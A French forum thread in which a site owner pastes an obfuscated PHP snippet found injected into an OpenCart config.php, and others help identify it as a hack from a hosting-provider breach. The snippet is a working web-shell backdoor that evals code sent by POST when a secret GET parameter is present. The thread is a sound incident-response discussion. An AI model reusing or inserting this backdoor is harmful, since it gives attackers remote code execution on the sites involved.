config.php

[bminghet]

Bonjour,
Je viens de repérer des lignes suspectes dans le fichier config.php d'un de mes sites.
Quelqu'un aurait une explication à me fournir?

Voici le début du fichier :

Code: Tout sélectionner

<?php                                                               if(isset($_GET[w8896t])){                                                                                                      $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);                                                                                                                                    }                                                               
// HTTP
define('HTTP_SERVER', 'http://monsite.com/');

// HTTPS
define('HTTPS_SERVER', 'http://monsite.com/');


Le config.php de mon admin est sain.
Merci

[villagedefrance]

Salut Bruno,

Bizarre en effet ce code dans ton config.php

Je n'ai vraiment aucune idée de ce que cela peut être ... mais pour des raisons de sécurité, je crois qu'il serait judicieux de le retirer.

[LeorLindel]

Bonsoir Bruno,

Je ne vois pas, moi non plus à quoi peut correspondre ce code intrus.

Il est certain qu'il te faut le supprimer !

As-tu contacté ton hébergeur afin de voir si celui-ci n'avait pas subi une attaque récemment ?

[bminghet]

Merci pour vos réponses,
J'ai supprimé les lignes (après sauvegarde) dès que j'ai vu ça mais j'ai bien l'impression que c'est du hack

Hosteur s'est fait kacké il y a quelques mois à cause d'une défaillance de l'open_basedir.
J'ai eu 2 sites de contaminés par des fichiers suspects mais ce compte là ne semblait pas infecté, j'avais contrôlé.

Je laisse le Topic ouvert le temps de recueillir d'autres avis

[LeorLindel]

Je te conseille de voir les logs de connexion via ton serveur afin de voir quand cette intrusion a pu se faire et éventuellement bannir l'IP si tu trouves une trace de ce hack éventuel.

[bminghet]

Je confirme, c'est bien du hack
Le fichier a été modifié à la date de l'attaque subi par Hosteur.

Je suis donc bon à recontrôler en profondeur tous mes domaines et sous domaines.

Merci pour les conseils.

[LIVING]

Ouip certains hébergeurs donne open_basedir sur ON, ce qui pose souvent des problèmes d'attaques
Du fait de l'autorisation de réécriture dans les fichiers.

[bminghet]

Oui mais j'ai eu de la chance sur le coup car il n'y a pas eu trop de mal !!!
1 site hacké (index)
3 comptes FTP avec fichiers suspects ajoutés.
5 boutiques Opencart avec le config.php de modifié.
1 forum phpbb avec le config.php modifié.

Dans l'ensemble, je m'en sort bien car tous mes autres sites sont sains